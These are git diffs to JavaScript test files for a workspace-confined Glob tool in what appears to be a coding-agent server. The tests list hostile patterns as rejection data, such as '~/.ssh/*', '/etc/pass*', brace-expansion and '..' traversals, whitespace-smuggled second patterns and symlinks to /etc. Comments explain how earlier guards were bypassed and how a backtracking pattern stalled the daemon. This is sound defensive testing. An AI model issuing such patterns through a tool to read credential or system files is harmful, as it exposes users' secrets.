+    "it's.txt",
+  ]
+  for (const m of CONTAINED) {
+    it(`keeps ${JSON.stringify(m)}`, () => {
+      assert.equal(globMatchEscapesRoot(m), false)
+    })
+  }
+
+  it('fails closed on a non-string match', () => {
+    for (const bad of [undefined, null, 42]) assert.equal(globMatchEscapesRoot(bad), true)
   })
 })

--- a/packages/server/tests/built-in-tools/tool-transforms.test.js
+++ b/packages/server/tests/built-in-tools/tool-transforms.test.js
@@ -163,6 +163,25 @@ describe('globPatternEscapeReason (#7341)', () => {
     ['{.,..}/x', /parent-directory/],
     ['{..,src}/x', /parent-directory/],
     ['src/{a,..}/x', /parent-directory/],
+    // Brace expansion runs BEFORE globbing, so this becomes the word
+    // `../etc/*` — a traversal whose SOURCE TEXT contains no `..` at all.
+    // The first cut of this guard was a set of anchored regexes and this
+    // walked straight through it.
+    ['.{.,x}/etc/pass*', /parent-directory/],
+    ['{.,x}{.,y}/etc/pass*', /parent-directory/],
+    // A glob MATCHES the `..` directory entry: `.*` expands to `. ..`
+    // (measured, bash 3.2 and 5.x), so these reach the parent with no `..`
+    // token present either.
+    ['.*/.*/etc/pass*', /parent-directory/],
+    ['.*/x', /parent-directory/],
+    ['..*/etc/pass*', /parent-directory/],
+    ['.?/etc/pass*', /parent-directory/],
+    ['.[.]/etc/pass*', /parent-directory/],
+    // The pattern is interpolated UNQUOTED, so whitespace makes it SEVERAL
+    // patterns and only the first one has to look innocent.
+    ['* /etc/pass*', /whitespace/],
+    ['* ~/.ssh/*', /whitespace/],
+    ['*.ts\t../../etc/pass*', /whitespace/],
   ]
   for (const [pattern, reason] of ESCAPES) {
     it(`rejects ${JSON.stringify(pattern)}`, () => {
@@ -189,6 +208,13 @@ describe('globPatternEscapeReason (#7341)', () => {
     '.github/workflows/*.yml',
     './src/*.ts',
     'a,b/*.txt',
+    '.github/**/*.yml',      // a dot-leading segment with no metachar
+    '.env*',                 // dot-leading WITH a metachar, but cannot match `..`
+    '.[a-z]*',               // ditto — `[a-z]` cannot match the second `.`
+    '.config/**',
+    '{src,tests}/**/*.js',   // ordinary brace expansion still works
+    '[.]*',                  // measured: a leading dot must be matched LITERALLY,
+                             // so this expands to nothing and cannot reach `..`
   ]
   for (const pattern of ALLOWED) {
     it(`allows ${JSON.stringify(pattern)}`, () => {
@@ -201,5 +227,36 @@ describe('globPatternEscapeReason (#7341)', () => {
     assert.match(msg, /^EINVAL: glob pattern escapes the workspace root/)
     assert.match(msg, /home-directory/)
     assert.match(msg, /"path" argument/)
+  })
+})
+
+describe('globPatternEscapeReason — brace-expansion ceilings (#7341)', () => {
+  it('REJECTS a brace bomb rather than skipping the check', () => {
+    // "Too complex to verify" must not read as "verified fine" — that is the
+    // cannot-check-so-nothing-to-check class in docs/false-safety-guards.md.
+    const bomb = '{a,b}'.repeat(12) + '/x'
+    assert.match(globPatternEscapeReason(bomb), /too large to verify/)
+  })
+
+  it('rejects an over-deep nest rather than skipping the check', () => {
+    let nest = 'x'
+    for (let i = 0; i < 12; i++) nest = `{${nest},y}`
+    assert.notEqual(globPatternEscapeReason(nest + '/z'), null)
+  })
+
+  it('still accepts a brace expansion just under the ceiling (positive control)', () => {
+    // Without this the two tests above would pass against a validator that
+    // rejected every brace pattern outright.
+    assert.equal(globPatternEscapeReason('{a,b}{c,d}/*.ts'), null)
+  })
+
+  it('leaves a comma-less brace body literal, as bash does', () => {
+    assert.equal(globPatternEscapeReason('{a}/*.ts'), null)
+  })
+
+  it('fails closed on a non-string pattern', () => {
+    for (const bad of [undefined, null, 42, {}]) {
+      assert.notEqual(globPatternEscapeReason(bad), null)
+    }
   })
 })

--- a/packages/server/tests/built-in-tools/tool-transforms.test.js
+++ b/packages/server/tests/built-in-tools/tool-transforms.test.js
@@ -182,6 +182,7 @@ describe('globPatternEscapeReason (#7341)', () => {
     // patterns and only the first one has to look innocent.
     ['* /etc/pass*', /whitespace/],
     ['* ~/.ssh/*', /whitespace/],
+    ['My Docs/*.pdf', /whitespace/],   // refused on BOTH paths, for parity
     ['*.ts\t../../etc/pass*', /whitespace/],
   ]
   for (const [pattern, reason] of ESCAPES) {

--- a/packages/server/tests/built-in-tools/tool-transforms.test.js
+++ b/packages/server/tests/built-in-tools/tool-transforms.test.js
@@ -164,20 +164,25 @@ describe('globPatternEscapeReason (#7341)', () => {
     ['{.,..}/x', /parent-directory/],
     ['{..,src}/x', /parent-directory/],
     ['src/{a,..}/x', /parent-directory/],
-    // Brace expansion runs BEFORE globbing, so this becomes the word
-    // `../etc/*` — a traversal whose SOURCE TEXT contains no `..` at all.
-    // The first cut of this guard was a set of anchored regexes and this
-    // walked straight through it.
-    ['.{.,x}/etc/pass*', /parent-directory/],
-    ['{.,x}{.,y}/etc/pass*', /parent-directory/],
-    // A glob MATCHES the `..` directory entry: `.*` expands to `. ..`
-    // (measured, bash 3.2 and 5.x), so these reach the parent with no `..`
-    // token present either.
-    ['.*/.*/etc/pass*', /parent-directory/],
-    ['.*/x', /parent-directory/],
-    ['..*/etc/pass*', /parent-directory/],
-    ['.?/etc/pass*', /parent-directory/],
-    ['.[.]/etc/pass*', /parent-directory/],
+      // NOTE: patterns that only REACH `..` by expansion — `.{.,x}/etc/*`,
+    // `..*/etc/*`, `.[.]/etc/*`, `{.,x}{.,y}/etc/*` — are deliberately NOT
+    // rejected here any more. Detecting them meant modelling brace expansion
+    // and glob-vs-`..` matching, which was both wrong (46/515 bracket segments)
+    // and a DoS. They are caught where they materialise: see the container's
+    // "escaping paths the container actually returned" test and the host's
+    // parent-escape test.
+    // Windows drive-absolute and UNC. These run on Windows CI (this file is not
+    // in WINDOWS_EXEMPT, unlike byok-tool-executor.test.js), which is the whole
+    // reason they belong here: the host Glob is portable now, but every test of
+    // it lives in a file no Windows job executes.
+    ['C:/Users/x/.ssh/*', /absolute path/],
+    ['C:\\Users\\x\\*', /absolute path/],
+    ['c:/Users/*', /absolute path/],
+    ['C:*', /absolute path/],
+    ['//server/share/*', /absolute path/],
+    ['{a,C:/etc}/x', /absolute path/],
+    ['..\\..\\etc\\pass*', /parent-directory/],
+    ['src\\..\\..\\etc', /parent-directory/],
     // The pattern is interpolated UNQUOTED, so whitespace makes it SEVERAL
     // patterns and only the first one has to look innocent.
     ['* /etc/pass*', /whitespace/],
@@ -215,8 +220,17 @@ describe('globPatternEscapeReason (#7341)', () => {
     '.[a-z]*',               // ditto — `[a-z]` cannot match the second `.`
     '.config/**',
     '{src,tests}/**/*.js',   // ordinary brace expansion still works
-    '[.]*',                  // measured: a leading dot must be matched LITERALLY,
-                             // so this expands to nothing and cannot reach `..`
+    '[.]*',
+    // `.*` and `.?` are allowed again. They CAN expand to `..` in a shell, and
+    // the previous cut rejected them for that reason — but computing "can this
+    // glob reach `..`" is what produced both a 12.9-second event-loop stall and
+    // 46 wrong answers out of 515 enumerated bracket segments. Containment moved
+    // to the output, where a `..` that actually materialises is caught for real,
+    // so the common "list the dotfiles" pattern works again.
+    '.*',
+    '.?',
+    '.[[:punct:]]',
+    '.[z-a]',                // an invalid class is a matcher's problem, not ours
   ]
   for (const pattern of ALLOWED) {
     it(`allows ${JSON.stringify(pattern)}`, () => {
@@ -232,28 +246,25 @@ describe('globPatternEscapeReason (#7341)', () => {
   })
 })
 
-describe('globPatternEscapeReason — brace-expansion ceilings (#7341)', () => {
-  it('REJECTS a brace bomb rather than skipping the check', () => {
-    // "Too complex to verify" must not read as "verified fine" — that is the
-    // cannot-check-so-nothing-to-check class in docs/false-safety-guards.md.
-    const bomb = '{a,b}'.repeat(12) + '/x'
-    assert.match(globPatternEscapeReason(bomb), /too large to verify/)
-  })
-
-  it('rejects an over-deep nest rather than skipping the check', () => {
-    let nest = 'x'
-    for (let i = 0; i < 12; i++) nest = `{${nest},y}`
-    assert.notEqual(globPatternEscapeReason(nest + '/z'), null)
-  })
-
-  it('still accepts a brace expansion just under the ceiling (positive control)', () => {
-    // Without this the two tests above would pass against a validator that
-    // rejected every brace pattern outright.
-    assert.equal(globPatternEscapeReason('{a,b}{c,d}/*.ts'), null)
-  })
-
-  it('leaves a comma-less brace body literal, as bash does', () => {
-    assert.equal(globPatternEscapeReason('{a}/*.ts'), null)
+describe('globPatternEscapeReason — cost (#7341)', () => {
+  // The layer this replaced was a denial of service. `{a,b}` × 8 fanned out to
+  // 256 words and each word's dot-leading segment was compiled to a regex with
+  // k adjacent unbounded quantifiers, then match-tested against `..`; V8
+  // backtracks that quadratically. MEASURED on the pre-fix tree: 4 KB of
+  // pattern = 12.9 SECONDS of blocked event loop, returning `null` — accepted.
+  // Glob is auto-approved in acceptEdits and callable in a loop, so that was a
+  // whole-daemon freeze from one tool call.
+  //
+  // The check is now a linear scan. This test fails if anything super-linear
+  // is ever reintroduced.
+  it('stays linear on a pathological pattern (no catastrophic backtracking)', () => {
+    for (const k of [4_000, 50_000, 200_000]) {
+      const pattern = '{a,b}'.repeat(8) + '/.' + '*'.repeat(k) + 'z'
+      const started = Date.now()
+      globPatternEscapeReason(pattern)
+      const elapsed = Date.now() - started
+      assert.ok(elapsed < 500, `${pattern.length} bytes took ${elapsed}ms — backtracking is back`)
+    }
   })
 
   it('fails closed on a non-string pattern', () => {
@@ -276,6 +287,14 @@ describe('globMatchEscapesRoot (#7341)', () => {
     '..',
     'a/..',
     '/',
+    // Both separators and the Windows absolute forms. Splitting on `/` alone
+    // is #6928 one layer down — a guard that knew one separator and let the
+    // other through.
+    '..\\etc\\passwd',
+    'src\\..\\..\\etc',
+    '\\etc\\passwd',
+    'C:\\Windows\\x',
+    'C:/Windows/x',
   ]
   for (const m of ESCAPES) {
     it(`withholds ${JSON.stringify(m)}`, () => {

--- a/packages/server/tests/built-in-tools/tool-transforms.test.js
+++ b/packages/server/tests/built-in-tools/tool-transforms.test.js
@@ -4,6 +4,8 @@ import {
   applyEdit,
   formatNumberedLines,
   GLOB_PATTERN_SHELL_METACHARS,
+  globPatternEscapeReason,
+  globPatternEscapeMessage,
   buildGlobCommand,
   buildGrepArgs,
   buildGrepCommand,
@@ -138,5 +140,66 @@ describe('buildGrepCommand', () => {
 
   it('threads the glob arg into the rg command', () => {
     assert.match(buildGrepCommand({ ...base, globArg: ` --glob '*.md'` }), /rg --no-config -i -n --no-heading --glob '\*\.md' -e 'TODO'/)
+  })
+})
+
+describe('globPatternEscapeReason (#7341)', () => {
+  // The shell behaviours these rules encode were MEASURED against bash before
+  // the rules were written — brace expansion runs before tilde expansion and
+  // yields each alternative as its own word, so `{~,.}/x` really does reach
+  // the home directory and a leading-anchor-only check really is bypassable.
+  const ESCAPES = [
+    ['~/.ssh/*', /home-directory/],
+    ['~', /home-directory/],
+    ['~-/secrets/*', /home-directory/],
+    ['{~,.}/.ssh/*', /home-directory/],
+    ['{.,~}/.ssh/*', /home-directory/],
+    ['/etc/pass*', /absolute path/],
+    ['{a,/etc}/passwd', /absolute path/],
+    ['../*', /parent-directory/],
+    ['..', /parent-directory/],
+    ['../../../../etc/pass*', /parent-directory/],
+    ['src/../../etc/pass*', /parent-directory/],
+    ['{.,..}/x', /parent-directory/],
+    ['{..,src}/x', /parent-directory/],
+    ['src/{a,..}/x', /parent-directory/],
+  ]
+  for (const [pattern, reason] of ESCAPES) {
+    it(`rejects ${JSON.stringify(pattern)}`, () => {
+      const got = globPatternEscapeReason(pattern)
+      assert.notEqual(got, null, `expected ${pattern} to be rejected`)
+      assert.match(got, reason)
+    })
+  }
+
+  // POSITIVE CONTROLS. Without these the whole suite above would pass just as
+  // well against a validator that rejected every pattern unconditionally —
+  // the #7273 shape, where a check that denies everything satisfies its own
+  // negative tests. These pin that ordinary globs still work.
+  const ALLOWED = [
+    '*',
+    '*.ts',
+    '**/*.ts',
+    'src/**/*.{js,ts}',
+    '*~',                    // emacs backup files — a trailing ~ never expands
+    'src/*~',
+    'report..final.md',      // `..` inside a filename is not a segment
+    'v1..v2/*.diff',
+    'src/[a-z]*.js',
+    '.github/workflows/*.yml',
+    './src/*.ts',
+    'a,b/*.txt',
+  ]
+  for (const pattern of ALLOWED) {
+    it(`allows ${JSON.stringify(pattern)}`, () => {
+      assert.equal(globPatternEscapeReason(pattern), null)
+    })
+  }
+
+  it('message names the reason and points at the `path` argument', () => {
+    const msg = globPatternEscapeMessage(globPatternEscapeReason('~/.ssh/*'))
+    assert.match(msg, /^EINVAL: glob pattern escapes the workspace root/)
+    assert.match(msg, /home-directory/)
+    assert.match(msg, /"path" argument/)
   })
 })

--- a/packages/server/tests/byok-tool-executor.test.js
+++ b/packages/server/tests/byok-tool-executor.test.js
@@ -1,8 +1,9 @@
 import { describe, it, beforeEach, afterEach, before, after } from 'node:test'
 import assert from 'node:assert/strict'
-import { mkdtempSync, writeFileSync, rmSync, mkdirSync, existsSync, symlinkSync } from 'node:fs'
+import { mkdtempSync, writeFileSync, rmSync, mkdirSync, existsSync, symlinkSync, realpathSync } from 'node:fs'
+import { glob as fsGlob } from 'node:fs/promises'
 import { tmpdir, homedir } from 'node:os'
-import { join } from 'node:path'
+import { join, resolve } from 'node:path'
 import { createServer } from 'node:http'
 import { executeBuiltinTool } from '../src/byok-tool-executor.js'
 
@@ -328,6 +329,150 @@ describe('executeBuiltinTool', () => {
       assert.equal(hit.isError, miss.isError)
       assert.equal(hit.content.replace('esc/passwd', 'X'), miss.content.replace('esc/definitely-no-such-file', 'X'))
       assert.equal(/\d/.test(hit.content), false, 'no count may leak')
+    })
+
+    it('withholds a parent-directory escape the matcher really does produce', async () => {
+      // THE test for layer 2, and the only one written against a vector that
+      // provably reaches a real secret. `{a}b,../TOP*}` walks past the
+      // syntactic guard — bash and node both skip a brace body with no
+      // top-level comma and keep scanning, which the guard does not model —
+      // so this is layer 2 alone, unaided.
+      //
+      // The `fsGlob` assertion is a POSITIVE CONTROL and is not decoration.
+      // Without it, "the tool returned no match" is satisfied just as well by
+      // a pattern that never matched anything, and the test would keep passing
+      // with the confinement deleted (docs/false-safety-guards.md).
+      const outer = mkdtempSync(join(tmpdir(), 'chroxy-glob-outer-'))
+      try {
+        writeFileSync(join(outer, 'TOPSECRET.txt'), 'pw')
+        const ws = join(outer, 'ws')
+        mkdirSync(ws)
+        writeFileSync(join(ws, 'a.ts'), '1')
+
+        for (const pattern of ['{a}b,../TOP*}', '../TOP*']) {
+          const raw = []
+          for await (const f of fsGlob(pattern, { cwd: ws })) raw.push(f)
+          assert.deepEqual(
+            raw, ['../TOPSECRET.txt'],
+            `precondition: ${pattern} must really escape, or this test proves nothing`,
+          )
+
+          const r = await executeBuiltinTool({
+            toolName: 'Glob',
+            input: { pattern },
+            cwd: ws,
+            cwdRealCache: new Map(),
+            cwdCacheTtl: 30_000,
+          })
+          assert.equal(
+            r.content.includes('TOPSECRET'), false,
+            `${pattern} must not reach outside the workspace`,
+          )
+        }
+
+        // Positive control on the SAME workspace: an in-bounds pattern still works.
+        const ok = await executeBuiltinTool({
+          toolName: 'Glob', input: { pattern: '*.ts' },
+          cwd: ws, cwdRealCache: new Map(), cwdCacheTtl: 30_000,
+        })
+        assert.match(ok.content, /a\.ts/)
+      } finally {
+        rmSync(outer, { recursive: true, force: true })
+      }
+    })
+
+    it('treats shell-only expansion syntax as literal characters (#7341)', async () => {
+      // The host no longer shells out, so quote removal, word splitting and
+      // POSIX bracket sub-expressions — three of the six bypasses review found
+      // against the old `for f in <pattern>` implementation — are not
+      // expansions any more, they are just characters that match no filename.
+      const outer = mkdtempSync(join(tmpdir(), 'chroxy-glob-outer-'))
+      try {
+        writeFileSync(join(outer, 'TOPSECRET.txt'), 'pw')
+        const ws = join(outer, 'ws')
+        mkdirSync(ws)
+        for (const pattern of [`'..'/TOP*`, `"..".${'/'}TOP*`, '.[[:punct:]]/TOP*']) {
+          const r = await executeBuiltinTool({
+            toolName: 'Glob', input: { pattern },
+            cwd: ws, cwdRealCache: new Map(), cwdCacheTtl: 30_000,
+          })
+          assert.equal(r.content.includes('TOPSECRET'), false, `${pattern} must not escape`)
+        }
+      } finally {
+        rmSync(outer, { recursive: true, force: true })
+      }
+    })
+
+    it('withholds a match it cannot resolve, rather than trusting it (fail-closed)', async () => {
+      // The fail-closed `catch` had NO test: a mutation flipping it to
+      // `return true` passed all 341 tests in this PR. That is the shape the
+      // whole issue is about — success and not-checking looking identical —
+      // so the escape hatch gets its own proof.
+      //
+      // A symlink cycle makes the component-wise resolver throw ELOOP, which
+      // is the only way to reach that branch without stubbing.
+      // Absolute targets: the test sandbox resolves a RELATIVE symlink target
+      // against process.cwd() and blocks it as a real-user-state write.
+      symlinkSync(join(dir, 'loop2'), join(dir, 'loop'))
+      symlinkSync(join(dir, 'loop'), join(dir, 'loop2'))
+      writeFileSync(join(dir, 'resolvable.ts'), '1')
+
+      const r = await executeBuiltinTool({ toolName: 'Glob', input: { pattern: '*' }, ...ctx() })
+      assert.equal(r.isError, false)
+      assert.equal(r.content.includes('loop'), false, 'an unresolvable match must be withheld')
+      // POSITIVE CONTROL, same call: an ordinary file is still returned, so
+      // this cannot pass by the tool having failed outright.
+      assert.match(r.content, /resolvable\.ts/)
+    })
+
+    it('never returns a path outside the workspace, over a corpus (property)', async () => {
+      // The rejection lists in this file are a hand-written enumeration of the
+      // classes someone thought of, and two review rounds found six more. This
+      // asserts the PROPERTY instead: whatever the pattern, every path the tool
+      // returns resolves inside the workspace. It is the test that does not
+      // need updating when round seven turns up.
+      const outer = mkdtempSync(join(tmpdir(), 'chroxy-glob-outer-'))
+      try {
+        writeFileSync(join(outer, 'TOPSECRET.txt'), 'pw')
+        const ws = join(outer, 'ws')
+        mkdirSync(join(ws, 'sub'), { recursive: true })
+        writeFileSync(join(ws, 'a.ts'), '1')
+        writeFileSync(join(ws, 'sub/b.ts'), '1')
+        symlinkSync(outer, join(ws, 'up'))
+        symlinkSync('/etc', join(ws, 'esc'))
+
+        const bits = ['*', '**', '..', '.', '/', '{', '}', ',', '~', "'", '"', '[', ']', '?', 'TOP', 'up', 'esc']
+        const corpus = ['../TOP*', '{a}b,../TOP*}', 'up/TOP*', 'esc/pass*', '{.,..}/TOP*', '.*/TOP*']
+        // Deterministic pseudo-random assembly — no Math.random, so a failure
+        // is reproducible from the seed.
+        let seed = 1337
+        const next = () => (seed = (seed * 1103515245 + 12345) % 2147483648)
+        for (let i = 0; i < 300; i++) {
+          let pat = ''
+          const len = 2 + (next() % 5)
+          for (let j = 0; j < len; j++) pat += bits[next() % bits.length]
+          corpus.push(pat)
+        }
+
+        const realWs = realpathSync(ws)
+        for (const pattern of corpus) {
+          const r = await executeBuiltinTool({
+            toolName: 'Glob', input: { pattern },
+            cwd: ws, cwdRealCache: new Map(), cwdCacheTtl: 30_000,
+          })
+          if (r.isError) continue                       // refused outright — fine
+          if (r.content.startsWith('No matches')) continue
+          for (const line of r.content.split('\n')) {
+            const resolved = realpathSync(resolve(realWs, line))
+            assert.ok(
+              resolved === realWs || resolved.startsWith(realWs + '/'),
+              `pattern ${JSON.stringify(pattern)} returned ${line} -> ${resolved}, outside ${realWs}`,
+            )
+          }
+        }
+      } finally {
+        rmSync(outer, { recursive: true, force: true })
+      }
     })
 
     it('still returns in-workspace matches alongside a withheld one (positive control)', async () => {

--- a/packages/server/tests/byok-tool-executor.test.js
+++ b/packages/server/tests/byok-tool-executor.test.js
@@ -743,25 +743,35 @@ describe('executeBuiltinTool', () => {
       // pins `confineGlobMatches`' per-directory verdict cache. A mutant that
       // computed a real verdict for the first directory and assumed `true` for
       // every later one returned /etc/passwd with all 346 tests green.
-      symlinkSync('/etc', join(dir, 'esc'))
-      mkdirSync(join(dir, 'keep'), { recursive: true })
-      writeFileSync(join(dir, 'keep/passenger.txt'), 'ok')
+      // The escape target is a directory THIS TEST owns, not `/etc`. An earlier
+      // cut pointed at `/etc` and pinned the exact match set — which passed on
+      // macOS and failed on the Linux CI runner, where `/etc` also holds
+      // `passwd-`. A precondition that encodes the host's filesystem contents
+      // is a precondition about the wrong thing.
+      const outside = mkdtempSync(join(tmpdir(), 'chroxy-glob-outside-'))
+      try {
+        writeFileSync(join(outside, 'secret.txt'), 'pw')
+        symlinkSync(outside, join(dir, 'esc'))
+        mkdirSync(join(dir, 'keep'), { recursive: true })
+        writeFileSync(join(dir, 'keep/secret.txt'), 'ok')
 
-      const raw = []
-      for await (const f of fsGlob('{esc,keep}/pass*', { cwd: dir })) raw.push(f)
-      assert.deepEqual(
-        raw.sort(), ['esc/passwd', 'keep/passenger.txt'],
-        'precondition: the matcher must really produce BOTH, or this proves nothing',
-      )
+        const raw = []
+        for await (const f of fsGlob('{esc,keep}/secret*', { cwd: dir })) raw.push(f)
+        assert.deepEqual(
+          raw.sort(), ['esc/secret.txt', 'keep/secret.txt'],
+          'precondition: the matcher must really produce BOTH, or this proves nothing',
+        )
 
-      const r = await executeBuiltinTool({
-        toolName: 'Glob',
-        input: { pattern: '{esc,keep}/pass*' },
-        ...ctx(),
-      })
-      assert.equal(r.isError, false)
-      assert.match(r.content, /keep\/passenger\.txt/)
-      assert.equal(r.content.includes('passwd'), false, 'the escaping match must be withheld')
+        const r = await executeBuiltinTool({
+          toolName: 'Glob',
+          input: { pattern: '{esc,keep}/secret*' },
+          ...ctx(),
+        })
+        assert.equal(r.isError, false)
+        assert.equal(r.content, 'keep/secret.txt', 'exactly the in-workspace match, nothing else')
+      } finally {
+        rmSync(outside, { recursive: true, force: true })
+      }
     })
 
     it('lists an in-workspace symlink that stays in the workspace (positive control)', async () => {

--- a/packages/server/tests/byok-tool-executor.test.js
+++ b/packages/server/tests/byok-tool-executor.test.js
@@ -403,6 +403,79 @@ describe('executeBuiltinTool', () => {
       }
     })
 
+    it('does not emit the workspace root itself for `**` (#7341 regression)', async () => {
+      // `fs.glob` yields the search ROOT as a match for `**`; `relative()`
+      // renders it '', which survived confinement and came out as a leading
+      // blank line — and as a bare '' on an empty workspace, where the shell
+      // implementation said "No matches". Both are regressions from the
+      // rewrite, not from the original bug.
+      const empty = mkdtempSync(join(tmpdir(), 'chroxy-glob-empty-'))
+      try {
+        const r0 = await executeBuiltinTool({
+          toolName: 'Glob', input: { pattern: '**' },
+          cwd: empty, cwdRealCache: new Map(), cwdCacheTtl: 30_000,
+        })
+        assert.equal(r0.isError, false)
+        assert.match(r0.content, /^No matches for/)
+      } finally {
+        rmSync(empty, { recursive: true, force: true })
+      }
+
+      // Non-empty: real matches, and no blank line among them.
+      writeFileSync(join(dir, 'a.ts'), '1')
+      mkdirSync(join(dir, 'sub'), { recursive: true })
+      writeFileSync(join(dir, 'sub/b.ts'), '1')
+      const r = await executeBuiltinTool({ toolName: 'Glob', input: { pattern: '**' }, ...ctx() })
+      assert.equal(r.isError, false)
+      const lines = r.content.split('\n')
+      assert.equal(lines.includes(''), false, 'the workspace root must not appear as an empty match')
+      assert.ok(lines.includes('a.ts') && lines.includes('sub/b.ts'), 'real matches must survive')
+    })
+
+    it('bounds a walk with a wall-clock timeout, and the bound FIRES', async () => {
+      // Dropping `executeBash` dropped its 30s kill, and `fs.glob` honours no
+      // AbortSignal (measured on Node 22: an already-aborted signal is simply
+      // ignored), so an unbounded walk was reachable. Asserting only the happy
+      // path here would be a guard whose success and whose absence look the
+      // same, so the budget is shrunk to 0 and the timeout branch is taken.
+      // The deadline can only be observed where the walk yields to the event
+      // loop, so the tree has to be big enough to span several ticks.
+      // MEASURED: 200 files in one directory times out 2/5 runs, 1000 across
+      // five directories times out 5/5. 1200 is used for margin — a smaller
+      // tree here would be a flaky test, not a faster one.
+      for (let d = 0; d < 8; d++) {
+        mkdirSync(join(dir, `d${d}`), { recursive: true })
+        for (let i = 0; i < 150; i++) writeFileSync(join(dir, `d${d}/f${i}.ts`), '1')
+      }
+
+      // POSITIVE CONTROL: the same call, same tree, with the normal budget.
+      const ok = await executeBuiltinTool({ toolName: 'Glob', input: { pattern: '**/*' }, ...ctx() })
+      assert.equal(ok.isError, false)
+      assert.match(ok.content, /d0\/f0\.ts/)
+
+      const prev = process.env.CHROXY_GLOB_TIMEOUT_MS
+      process.env.CHROXY_GLOB_TIMEOUT_MS = '0'
+      try {
+        const r = await executeBuiltinTool({ toolName: 'Glob', input: { pattern: '**/*' }, ...ctx() })
+        assert.equal(r.isError, true, 'a zero budget must time out, not succeed')
+        assert.match(r.content, /timed out after 0ms/)
+      } finally {
+        if (prev === undefined) delete process.env.CHROXY_GLOB_TIMEOUT_MS
+        else process.env.CHROXY_GLOB_TIMEOUT_MS = prev
+      }
+    })
+
+    it('honors a pre-aborted signal', async () => {
+      writeFileSync(join(dir, 'a.ts'), '1')
+      const controller = new AbortController()
+      controller.abort()
+      const r = await executeBuiltinTool({
+        toolName: 'Glob', input: { pattern: '**/*' }, signal: controller.signal, ...ctx(),
+      })
+      assert.equal(r.isError, true)
+      assert.match(r.content, /interrupted/i)
+    })
+
     it('withholds a match it cannot resolve, rather than trusting it (fail-closed)', async () => {
       // The fail-closed `catch` had NO test: a mutation flipping it to
       // `return true` passed all 341 tests in this PR. That is the shape the

--- a/packages/server/tests/byok-tool-executor.test.js
+++ b/packages/server/tests/byok-tool-executor.test.js
@@ -1,7 +1,7 @@
 import { describe, it, beforeEach, afterEach, before, after } from 'node:test'
 import assert from 'node:assert/strict'
-import { mkdtempSync, writeFileSync, rmSync, mkdirSync, existsSync } from 'node:fs'
-import { tmpdir } from 'node:os'
+import { mkdtempSync, writeFileSync, rmSync, mkdirSync, existsSync, symlinkSync } from 'node:fs'
+import { tmpdir, homedir } from 'node:os'
 import { join } from 'node:path'
 import { createServer } from 'node:http'
 import { executeBuiltinTool } from '../src/byok-tool-executor.js'
@@ -211,6 +211,114 @@ describe('executeBuiltinTool', () => {
       for (const pat of ['*.ts | cat', '*.ts; ls', '*.ts > /tmp/x', '*.ts && rm -rf']) {
         const r = await executeBuiltinTool({ toolName: 'Glob', input: { pattern: pat }, ...ctx() })
         assert.equal(r.isError, true, `expected error for: ${pat}`)
+      }
+    })
+
+    // ---- #7341: the PATTERN escapes the workspace root -------------------
+    //
+    // Pre-fix these ALL returned isError:false with real file contents —
+    // measured end-to-end through this same dispatcher. `pattern` was checked
+    // only against GLOB_PATTERN_SHELL_METACHARS, a shell-INJECTION denylist
+    // that permits `~`, `/` and `..`; the sibling `path` field was fully
+    // realpath-confined. Glob is auto-approved in acceptEdits mode and gets
+    // only the reduced secrets floor, so this was a read-anything primitive
+    // behind a tool classified read-only.
+    //
+    // These assertions must FAIL on the pre-fix tree — verified by restoring
+    // the pre-fix src/ and re-running (docs/false-safety-guards.md).
+
+    it('refuses a home-directory (~) pattern (security #7341)', async () => {
+      for (const pattern of ['~/.ssh/*', '{~,.}/.ssh/*']) {
+        const r = await executeBuiltinTool({ toolName: 'Glob', input: { pattern }, ...ctx() })
+        assert.equal(r.isError, true, `expected error for: ${pattern}`)
+        assert.match(r.content, /escapes the workspace root/)
+        assert.equal(
+          r.content.includes(homedir()),
+          false,
+          `${pattern} must not leak paths under the real home directory`,
+        )
+      }
+    })
+
+    it('refuses an absolute pattern (security #7341)', async () => {
+      for (const pattern of ['/etc/pass*', '{a,/etc}/pass*']) {
+        const r = await executeBuiltinTool({ toolName: 'Glob', input: { pattern }, ...ctx() })
+        assert.equal(r.isError, true, `expected error for: ${pattern}`)
+        assert.match(r.content, /escapes the workspace root/)
+        assert.equal(r.content.includes('passwd'), false, `${pattern} must not list /etc`)
+      }
+    })
+
+    it('refuses a `..` traversal pattern (security #7341)', async () => {
+      // Enough `..` to clear even a deep macOS /private/var/folders tmpdir —
+      // a shallower one silently "passes" as No-matches and proves nothing.
+      for (const pattern of [
+        '../'.repeat(12) + 'etc/pass*',
+        'src/../' + '../'.repeat(11) + 'etc/pass*',
+        '{.,..}/' + '../'.repeat(11) + 'etc/pass*',
+      ]) {
+        const r = await executeBuiltinTool({ toolName: 'Glob', input: { pattern }, ...ctx() })
+        assert.equal(r.isError, true, `expected error for: ${pattern}`)
+        assert.match(r.content, /escapes the workspace root/)
+        assert.equal(r.content.includes('passwd'), false, `${pattern} must not list /etc`)
+      }
+    })
+
+    it('withholds matches reached through a symlinked directory (security #7341)', async () => {
+      // The escape no pattern inspection can see: every character of
+      // `esc/pass*` is legal. Only resolving the expanded RESULTS catches it.
+      symlinkSync('/etc', join(dir, 'esc'))
+      const r = await executeBuiltinTool({
+        toolName: 'Glob',
+        input: { pattern: 'esc/pass*' },
+        ...ctx(),
+      })
+      assert.equal(r.content.includes('passwd'), false, 'must not list /etc through a symlink')
+      assert.match(r.content, /outside the workspace withheld/)
+    })
+
+    it('still returns in-workspace matches alongside a withheld one (positive control)', async () => {
+      // Guards the #7273 shape: a confiner that dropped EVERYTHING would pass
+      // the test above for the wrong reason and keep passing if the real rule
+      // were deleted. Here a legitimate match must survive the same call.
+      symlinkSync('/etc', join(dir, 'esc'))
+      mkdirSync(join(dir, 'keep'), { recursive: true })
+      writeFileSync(join(dir, 'keep/passenger.txt'), 'ok')
+      const r = await executeBuiltinTool({
+        toolName: 'Glob',
+        input: { pattern: '*/pass*' },
+        ...ctx(),
+      })
+      assert.equal(r.isError, false)
+      assert.match(r.content, /keep\/passenger\.txt/)
+      assert.equal(r.content.includes('esc/passwd'), false)
+      assert.match(r.content, /outside the workspace withheld/)
+    })
+
+    it('lists an in-workspace symlink that stays in the workspace (positive control)', async () => {
+      // A symlink is confined by where it POINTS, not by being a symlink.
+      mkdirSync(join(dir, 'real'), { recursive: true })
+      writeFileSync(join(dir, 'real/inside.txt'), 'ok')
+      symlinkSync(join(dir, 'real'), join(dir, 'alias'))
+      const r = await executeBuiltinTool({
+        toolName: 'Glob',
+        input: { pattern: 'alias/*.txt' },
+        ...ctx(),
+      })
+      assert.equal(r.isError, false)
+      assert.match(r.content, /alias\/inside\.txt/)
+      assert.equal(r.content.includes('withheld'), false)
+    })
+
